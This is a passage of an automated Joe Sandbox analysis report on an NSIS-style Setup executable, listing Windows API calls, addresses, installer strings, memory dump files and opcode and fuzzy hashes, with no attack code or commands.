• Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
APIs
• KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
• Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
• Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
• Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004049BF
• GetDlgItem.USER32(?,00000408), ref: 004049CC
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
• LoadBitmapW.USER32(0000006E), ref: 00404A2E
• SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
• DeleteObject.GDI32(?), ref: 00404AA5
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
• GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
• ShowWindow.USER32(?,00000005), ref: 00404BFB
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
• ImageList_Destroy.COMCTL32(?), ref: 00404DC8
• GlobalFree.KERNEL32(?), ref: 00404DD8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
• SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
• ShowWindow.USER32(?,00000000), ref: 00404F75
• GetDlgItem.USER32(?,000003FE), ref: 00404F80
• ShowWindow.USER32(00000000), ref: 00404F87
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $ @$M$N
• API String ID: 1638840714-3479655940
• Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
• Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
• Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
• Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
APIs
• DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
• lstrlenW.KERNEL32(?), ref: 00406D58
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
Strings
• Delete: DeleteFile("%s"), xrefs: 00406DE8
• RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
• ptF, xrefs: 00406D1A
• RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
• Delete: DeleteFile failed("%s"), xrefs: 00406E29
• RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
• Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
• \*.*, xrefs: 00406D2F
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
• API String ID: 2035342205-1650287579
• Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
• Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
• Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
• Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                              • String ID: F$A
                                                                                                                                                                              • API String ID: 3347642858-1281894373
                                                                                                                                                                              • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                              • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                              • API String ID: 1916479912-1189179171
                                                                                                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406A73
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                              • API String ID: 3581403547-1792361021
                                                                                                                                                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                              Strings
                                                                                                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
• Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
• Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
• Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
• Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
• Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
• Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
